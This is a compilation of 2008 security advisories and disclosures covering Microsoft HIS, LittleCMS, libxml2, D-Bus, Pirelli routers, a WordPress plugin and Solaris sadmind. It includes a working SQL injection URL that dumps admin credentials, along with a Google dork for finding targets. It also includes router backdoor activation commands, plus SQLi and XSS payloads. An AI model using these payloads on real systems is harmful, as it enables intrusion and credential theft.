iDefense Security Advisory 10.14.08: Microsoft Host Integration Server 2006 Command Execution Vulnerability
iDefense Security Advisory 10.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 14, 2008

I. BACKGROUND

The Host Integration Server is an application suite that is used to communicate with IBM mainframe servers. One of the components of the suite is a remote management interface. This interface is implemented by an RPC server that listens on a dynamic TCP port. The UUID of the vulnerable RPC service is 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'. For more information regarding the Host Integration Server, see the vendor's website found at the following URL.

http://www.microsoft.com/hiserver/default.mspx

II. DESCRIPTION

Remote exploitation of an arbitrary command execution vulnerability in Microsoft Corp.'s Host Integration Server 2006 could allow an attacker to execute arbitrary code with the privileges of the affected service.

The RPC interface exposes several methods that an unauthenticated attacker can use to execute arbitrary programs on the server. RPC opcodes 1 and 6 both allow an attacker to call the CreateProcess() function with full control over the application started, as well as the command line passed to it. This allows an attacker to run arbitrary programs on the server.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. The privileges gained depend on the user account that the Host Integration Server is configured to use during installation. The service does not require SYSTEM privileges to run.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Host Integration Server 2006. Previous versions may also be affected.

V. WORKAROUND

Use the Service Control Manager to disable the SNA RPC service, and prevent it from starting automatically. This will prevent the vulnerable service from running, but will also prevent remote management.

Firewalling the TCP port is not a valid workaround, since the port used for communication is dynamically assigned when the service starts.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security Bulletin MS08-059. For more information, consult their bulletin at the following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-059.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3466 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

05/27/2008 Initial vendor notification.
05/27/2008 Initial vendor response.
10/14/2008 Coordinated public disclosure.

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[USN-652-1] LittleCMS vulnerability
===
Ubuntu Security Notice USN-652-1
October 14, 2008
lcms vulnerability
CVE-2007-2741
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  liblcms1  1.13-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Chris Evans discovered that certain ICC operations in lcms were not correctly bounds-checked. If a user or automated system were tricked into processing an image with malicious ICC tags, a remote attacker could crash applications linked against liblcms1, leading to a denial of service, or possibly execute arbitrary code with user privileges.

Updated packages for Ubuntu 6.06 LTS:
Webscene eCommerce (level) Remote Sql Injection
# Webscene eCommerce (level) Remote Sql Injection
#
# vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
# Bug Found By : Angela Chang (14-10-2008)
# contact: angel[at]ch4ng.cc
#
# Greetz: nyubi & Vrs-Chk
#

### vuln file : productlist.php

Input passed to the "level" parameter is not properly verified before being used. This can be exploited to conduct remote SQL injection.

exploit :

http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

Google dork : inurl:productlist.php?categoryid= level
[SECURITY] [DSA 1654-1] New libxml2 packages fix execution of arbitrary code
Debian Security Advisory DSA-1654-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                           Steve Kemp
October 14, 2008                    http://www.debian.org/security/faq

Package        : libxml2
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-3529
Debian Bug     : 498768

It was discovered that libxml2, the GNOME XML library, didn't correctly handle long entity names. This could allow the execution of arbitrary code via a malicious XML file.

For the stable distribution (etch), this problem has been fixed in version 2.6.27.dfsg-5.

For the unstable distribution (sid), this problem has been fixed in version 2.6.32.dfsg-4.

We recommend that you upgrade your libxml2 package.

Upgrade instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
[USN-653-1] D-Bus vulnerabilities
===
Ubuntu Security Notice USN-653-1
October 14, 2008
dbus vulnerabilities
CVE-2008-0595, CVE-2008-3834
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libdbus-1-2  0.60-6ubuntu8.3

Ubuntu 7.04:
  libdbus-1-3  1.0.2-1ubuntu4.2

Ubuntu 7.10:
  libdbus-1-3  1.1.1-3ubuntu4.2

Ubuntu 8.04 LTS:
  libdbus-1-3  1.1.20-1ubuntu3.1

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

Havoc Pennington discovered that the D-Bus daemon did not correctly validate certain security policies. If a local user sent a specially crafted D-Bus request, they could bypass security policies that had a "send_interface" defined. (CVE-2008-0595)

It was discovered that the D-Bus library did not correctly validate certain corrupted signatures. If a local user sent a specially crafted D-Bus request, they could crash applications linked against the D-Bus library, leading to a denial of service. (CVE-2008-3834)

Updated packages for Ubuntu 6.06 LTS:
Telecom Italia Alice Pirelli routers backdoor discovered to activate telnet/ftp/tftp from internal LAN/WLAN.
# saxdax & drpepperONE

Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from the internal network LAN, on Alice ADSL CPE Modem/Routers manufactured by Pirelli and based on the Broadcom platform.

Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactured by Pirelli based on Broadcom platform.
Model Affected: AGA [Alice Gate2 plus Wi-Fi] / AGB [Alice Gate2 plus] / AG2P-AG3 [Alice Gate W2+] / AGPV-AGPF [Alice Gate VoIP 2 Plus Wi-Fi]
Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware versions are affected.
Platforms: Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.
Vulnerability: enable telnet/ftp/tftp and web-admin from internal LAN.
Exploitation: internal network LAN, versus Router
Date: 13 Oct 2008
Authors: saxdax & drpepperONE
e-mail: [EMAIL PROTECTED] [EMAIL PROTECTED]
Risk: medium>low

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

=== 1) Introduction ===

Telecom Italia is the most important Italian ISP, offering an ADSL service named "Alice". With the "Alice Adsl" service Telecom Italia rents out different CPE Modem/Routers, among which are the affected ones. The interface to configure these modems is made extremely poor by the provider to ensure more control: there is no way to enable telnet, ftp, tftp or more advanced web pages from the web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

=== 2) Vulnerability ===

An attacker can activate and get unauthorized access to the router's administration interface and telnet/ftp/tftp services from the internal network. Every user in the LAN (or Wireless LAN) can nevertheless have access to the router's administration interface and telnet/ftp/tftp! If an attacker can get access to the administrator interface and log in, he has full control over the router's configuration.

=== 3) The Exploit ===

To enable telnet/ftp/tftp and the web-admin interface it is necessary to send a special IP packet to the router's specific IP 192.168.1.1. This works only from the internal LAN, where an attacker has an IP like 192.168.1.XX. The IP packet sent to the router must have the following features:

1) IP protocol number 255 (there is a RAW SOCKET listening on the router)
2) Payload size 8 bytes
3) The payload is the first 8 bytes of a salted MD5 of the MAC address of device br0
4) br0 in these modems has the same MAC as eth0

When the modem receives the packet all services will be enabled.

Example, from a GNU/Linux distribution:

1) Retrieve the br0 MAC address:

   arping -I eth0 -c 2 192.168.1.1
   ARPING 192.168.1.1 from 192.168.1.2 eth0
   Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms
   Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms
   Sent 2 probes (1 broadcast(s))
   Received 2 response(s)

2) Calculate the special MD5 hash from the br0 MAC address: create a 6-byte-long hex file with the MAC address, run the application below and copy the output hash.

   http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3) Send the IP packet to router IP 192.168.1.1 with the 8-byte payload file (with the tool you like), i.e.:

   nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

4) Telnet to the router:

   telnet 192.168.1.1
   BCM96348 ADSL Router
   Login: admin
   Password:

=== 4) The Code ===

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the payload of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include "md5.h"

/*
 * RFC 1321 compliant MD5 implementation
 *
 * Copyright (C) 2001-2003 Christophe Devine
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 *
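The trigger packet described in section 3 has a fixed, easily recognised shape, which is what a LAN operator can monitor for. The following detector is an added example and not the authors' code: it parses a raw IPv4 datagram and flags any datagram that matches every listed property (protocol 255, exactly 8 payload bytes, destination 192.168.1.1). The function names, the ROUTER_IP constant and the sample payload bytes are assumptions; the payload is never interpreted and the hash is not computed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 192.168.1.1, the router address named in the post */
#define ROUTER_IP 0xC0A80101u

enum verdict { PKT_MALFORMED = -1, PKT_BENIGN = 0, PKT_BACKDOOR_TRIGGER = 1 };

/* Inspect one IPv4 datagram of len bytes (header + payload, no link layer).
 * Returns PKT_BACKDOOR_TRIGGER when it matches every property the post lists
 * (protocol 255, exactly 8 payload bytes, destination 192.168.1.1),
 * PKT_BENIGN otherwise, and PKT_MALFORMED when the header cannot be parsed
 * safely. The payload bytes themselves are never interpreted. */
int classify_ipv4(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;        /* header length in bytes */
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];    /* total length field */
    if (ihl < 20 || total < ihl || total > len)       /* never trust length fields */
        return PKT_MALFORMED;
    uint8_t proto = pkt[9];
    uint32_t dst = ((uint32_t)pkt[16] << 24) | ((uint32_t)pkt[17] << 16) |
                   ((uint32_t)pkt[18] << 8) | (uint32_t)pkt[19];
    size_t payload = total - ihl;
    if (proto == 255 && payload == 8 && dst == ROUTER_IP)
        return PKT_BACKDOOR_TRIGGER;
    return PKT_BENIGN;
}

/* Writes a constructed IPv4 datagram (IHL 5, checksum left zero because the
 * classifier does not need it) into out and returns its length. Only used to
 * build sample input for the detector. */
size_t make_sample(uint8_t *out, uint8_t proto, uint32_t src, uint32_t dst,
                   const uint8_t *payload, size_t plen)
{
    size_t total = 20 + plen;
    memset(out, 0, total);
    out[0] = 0x45;                         /* version 4, IHL 5 */
    out[2] = (uint8_t)(total >> 8);
    out[3] = (uint8_t)total;
    out[8] = 64;                           /* TTL */
    out[9] = proto;
    for (int i = 0; i < 4; i++) {          /* addresses, network byte order */
        out[12 + i] = (uint8_t)(src >> (24 - 8 * i));
        out[16 + i] = (uint8_t)(dst >> (24 - 8 * i));
    }
    memcpy(out + 20, payload, plen);
    return total;
}

/* Runs the classifier over two constructed packets and returns how many
 * raised an alert, so the result can be checked without reading stdout. */
int demo_alert_count(void)
{
    /* constructed dummy bytes, not the backdoor hash */
    static const uint8_t dummy8[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    static const uint8_t dummy16[16] = {0};
    uint8_t buf[64];
    int alerts = 0;
    size_t n;

    /* protocol 255, 8-byte payload, to 192.168.1.1: matches the profile */
    n = make_sample(buf, 255, 0xC0A80102u, ROUTER_IP, dummy8, sizeof dummy8);
    if (classify_ipv4(buf, n) == PKT_BACKDOOR_TRIGGER) {
        alerts++;
        puts("ALERT: proto-255 8-byte datagram to router (backdoor trigger profile)");
    }
    /* same protocol but a 16-byte payload: does not match this rule */
    n = make_sample(buf, 255, 0xC0A80102u, ROUTER_IP, dummy16, sizeof dummy16);
    if (classify_ipv4(buf, n) == PKT_BACKDOOR_TRIGGER)
        alerts++;
    return alerts;                         /* 1 */
}

int main(void)
{
    printf("alerts: %d\n", demo_alert_count());
    return 0;
}
```

Since the router listens for this on a raw socket, a single matching datagram is already worth an alert; IP protocol 255 is reserved and should not appear in normal LAN traffic at all.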
WP Comment Remix 1.4.3 Multiple Vulnerabilities
ChX Security | Advisory #3
-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-

Advisory Information
===
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
Author: g30rg3_x
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt
Date of last update: 2008-10-13
CVE Name: --

Vulnerability Information
===
Software: WP Comment Remix
Version: 1.4.3
From: Remote
Severity: Extremely Critical
Impact: Manipulation of data, Cross-Site Scripting
Type of Advisory: Full Disclosure

Software Description
===
WP Comment Remix adds a plethora of new options and features to WordPress. From Reply and Quote links for commenters, to a full upgrade to the edit comments pages in the admin panel, WPCR will save you time and effort when running your blog.

Vulnerability Description
===
WP Comment Remix has multiple vulnerabilities which allow remote attackers to conduct SQL Injection, Cross-Site Scripting and Cross-Site Request Forgery attacks. The SQL Injection is possible due to lack of filtering on the comment post ID variable in the AJAX Comments script. The Cross-Site Scripting is possible due to lack of filtering and escaping on several stored options. The Cross-Site Request Forgery is caused by the lack of WordPress Nonces on the options panel form.

Technical Description
===

* SQL Injection *

Inside the script "ajax_comments.php" (around lines 27 to 29):

/--
$id = $_GET['p'];
$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE comment_post_ID = $id AND comment_approved != 'spam' ORDER BY comment_date DESC");
--/

As you can see in the presented code, the value of $id is taken from the HTTP GET variable p and then used directly inside the SQL query passed to the get_results method of the $wpdb object (which allows WordPress plugin developers to pull multiple row results from the database), so we can inject SQL code and the data will later be shown as comment data by the script. As an example we can inject something like this:

/--
ajax_comments.php?p=0 UNION SELECT 1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15 --
--/

to obtain the MySQL user, database name and MySQL version used on the server.

* Cross-Site Scripting *

Inside the script "wpcommentremix.php" (around lines 611 to 781) (the next code is truncated to only show the vulnerable parts of the code):

/--
$options['replytotext'] = $_POST['replytotext'];
...
$options['quotetext'] = $_POST['quotetext'];
$options['originallypostedby'] = $_POST['originallypostedby'];
$options['sep'] = $_POST['sep'];
$options['maxtags'] = $_POST['maxtags'];
...
$options['tagsep'] = $_POST['tagsep'];
$options['tagheadersep'] = $_POST['tagheadersep'];
$options['taglabel'] = $_POST['taglabel'];
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];
...
' />
...
--/

These variables totally lack filtering and escaping, so if we store something like this...

/--
5">alert(String.fromCharCode(88,83,83));
--/

http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip

Solution
===
Upgrade to version 1.4.4

Timeline
===
Bug Found: 16/09/2008
Vendor Contact: 20/09/2008
Vendor Response: 23/09/2008
Public Disclosure: 13/10/2008

ChX Security
http://chxsecurity.org/
(c) 2008

--
Original: http://chxsecurity.org/advisories/adv-3-full.txt
[RISE-2008001] Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
RISE-2008001
Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
http://risesecurity.org/advisories/RISE-2008001.txt

Published: October 14, 2008
Updated: October 14, 2008

INTRODUCTION

There exists a vulnerability within a function of the Sun Solstice AdminSuite sadmind, which when properly exploited can lead to remote compromise of the vulnerable system.

This vulnerability was confirmed by us in the following versions of the Sun operating system; other versions may also be affected.

Sun Solaris 9 SPARC
Sun Solaris 9 x86
Sun Solaris 8 SPARC
Sun Solaris 8 x86

DETAILS

Solstice AdminSuite is a collection of graphical user interface tools and commands used to perform administrative tasks such as managing users, groups, hosts, system files, printers, disks, file systems, terminals, and modems.

The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations.

The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.

The vulnerable function adm_build_path() does not validate user supplied data when appending it to a stack-based buffer using strcat(), resulting in a stack-based buffer overflow.

The exploitation of this vulnerability is trivial and results in remote compromise of the vulnerable system.

This is the debug information about this vulnerability (from Sun Solaris 9 x86).
Breakpoint 1, 0xd330e5b0 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) until *adm_build_path+38
0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5c6 :    call   0xd3304fa8 <[EMAIL PROTECTED]>
(gdb) x/x $esp+4
0x80411e4:      0x080b7cd0
(gdb) x/x $esp
0x80411e0:      0x08041208
(gdb) x/s 0x080b7cd0
0x80b7cd0:       'A' ...
(gdb) x/s 0x08041208
0x8041208:       "system.2.1/"
(gdb) where
#0  0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xd335326b in verify_vers_1 () from /usr/snadm/lib/libadmagt.so.2
#3  0xd3352e88 in verify_validate () from /usr/snadm/lib/libadmagt.so.2
#4  0xd3352cf8 in amsl_verify () from /usr/snadm/lib/libadmagt.so.2
#5  0xd32c8a85 in __0fQNetmgtDispatcherPdispatchRequestP6Hsvc_reqP6J__svcxprt () from /usr/snadm/lib/libadmcom.so.2
#6  0xd32c8656 in __0fQNetmgtDispatcherOreceiveRequestP6Hsvc_reqP6J__svcxprt () from /usr/snadm/lib/libadmcom.so.2
#7  0xd32c837c in _netmgt_receiveRequest () from /usr/snadm/lib/libadmcom.so.2
#8  0xd311d4a3 in _svc_prog_dispatch () from /usr/lib/libnsl.so.1
#9  0xd311d24e in svc_getreq_common () from /usr/lib/libnsl.so.1
#10 0xd311d130 in svc_getreq_poll () from /usr/lib/libnsl.so.1
#11 0xd3121550 in _svc_run () from /usr/lib/libnsl.so.1
#12 0xd3121293 in svc_run () from /usr/lib/libnsl.so.1
#13 0xd32cd165 in __0fQNetmgtDispatcherNstartupServerv () from /usr/snadm/lib/libadmcom.so.2
#14 0xd32cd13b in netmgt_start_agent () from /usr/snadm/lib/libadmcom.so.2
#15 0x0805168f in main ()
(gdb) stepi
0xd3304fa8 in [EMAIL PROTECTED] () from /usr/snadm/lib/libadmapm.so.2
(gdb) step
Single stepping until exit from function [EMAIL PROTECTED], which has no line number information.
0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5cb :    add    $0x8,%esp
(gdb) where
#0  0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xaabbccdd in ?? ()
#3  0x08063000 in ?? ()
#4  0x08063128 in ?? ()
#5  0x080b7cd0 in ?? ()
#6  0x08041730 in ?? ()
#7  0x0400 in ?? ()
#8  0x0001 in ?? ()
#9  0xd336ac8c in ?? () from /usr/snadm/lib/libadmagt.so.2
#10 0x in ?? ()
(gdb) c
Continuing.

Breakpoint 1, 0xd330e5b0 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xaabbccdd in ?? ()
(gdb)

A proof of concept code for this vulnerability can be downloaded from our website http://risesecurity.org/.

VENDOR

Sun Security Coordination Team was notified of this issue; proper corrections should be available soon. Meanwhile, we recommend disabling the distributed system administration daemon (sadmind).

CREDITS

This vulnerability was discovered by Adriano Lima <[EMAIL PROTECTED]>.

DISCLAIMER

The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liab
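The advisory's debug session shows the shape of the bug: a prefix "system.2.1/" already on the stack, and a caller-supplied argument (the run of 'A' bytes) appended to it with strcat() and no comparison against the space left. The following is an added example, not the sadmind source (which is not reproduced on the page): the unchecked pattern next to a bounds-checked builder that computes the required length up front and refuses oversized input instead of overflowing. The function names, PATH_BUF and the component strings are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Small on purpose so the limit is easy to reach in the demo. */
#define PATH_BUF 64

/* The vulnerable shape: components are appended with strcat() and nothing
 * compares their length with the space left in the caller's buffer, so a
 * component longer than the remaining space overruns the stack. Shown only
 * to contrast with the checked version; never call it on untrusted input. */
void build_path_unsafe(char *out, const char *dir, const char *name)
{
    strcpy(out, dir);
    strcat(out, "/");
    strcat(out, name);
}

/* Hardened version: the caller passes the buffer size, the required length
 * is computed up front with an overflow guard, and the call fails with -1
 * instead of overflowing. It refuses rather than truncates, because a
 * silently shortened path could resolve to a different method or file.
 * On success returns the length of the string written. */
int build_path_checked(char *out, size_t outsz, const char *dir, const char *name)
{
    size_t dlen = strlen(dir), nlen = strlen(name);
    if (dlen > SIZE_MAX - 2 || nlen > SIZE_MAX - 2 - dlen)
        return -1;                         /* size_t arithmetic would wrap */
    size_t need = dlen + 1 + nlen + 1;     /* dir, '/', name, NUL */
    if (need > outsz)
        return -1;                         /* would not fit: reject, do not truncate */
    memcpy(out, dir, dlen);
    out[dlen] = '/';
    memcpy(out + dlen + 1, name, nlen);
    out[dlen + 1 + nlen] = '\0';
    return (int)(need - 1);
}

/* Mirrors the advisory's debug session, where the prefix on the stack was
 * "system.2.1/" and the appended argument was a long run of 'A' bytes:
 * a normal component is accepted, the oversized one is rejected and the
 * buffer is left untouched. Returns 1 when both outcomes are as expected. */
int demo_long_component_rejected(void)
{
    char buf[PATH_BUF];
    char name[128];                        /* longer than PATH_BUF on purpose */
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';

    int ok = build_path_checked(buf, sizeof buf, "system.2.1", "verify");
    int rc = build_path_checked(buf, sizeof buf, "system.2.1", name);
    return ok == 17 && rc == -1 && strcmp(buf, "system.2.1/verify") == 0;
}

int main(void)
{
    char buf[PATH_BUF];
    build_path_unsafe(buf, "system.2.1", "verify");   /* fits, so harmless here */
    printf("unsafe: %s\n", buf);
    printf("checked demo ok: %d\n", demo_long_component_rejected());
    return 0;
}
```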